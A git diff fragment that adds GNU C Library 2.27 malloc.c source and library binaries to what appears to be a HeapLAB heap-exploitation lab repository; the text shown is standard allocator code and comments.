+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so b/HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so
new file mode 100755
index 0000000..cff7bd2
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_no-tcache/ld-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2 b/HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2
new file mode 120000
index 0000000..2ffc93b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_no-tcache/ld.so.2
@@ -0,0 +1 @@
+ld-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so b/HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so
new file mode 100755
index 0000000..a6732c1
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_no-tcache/libc-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6 b/HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6
new file mode 120000
index 0000000..aa8ad7a
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_no-tcache/libc.so.6
@@ -0,0 +1 @@
+libc-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c
new file mode 100644
index 0000000..f8e7250
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_no-tcache/malloc/malloc.c
@@ -0,0 +1,5607 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2018 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
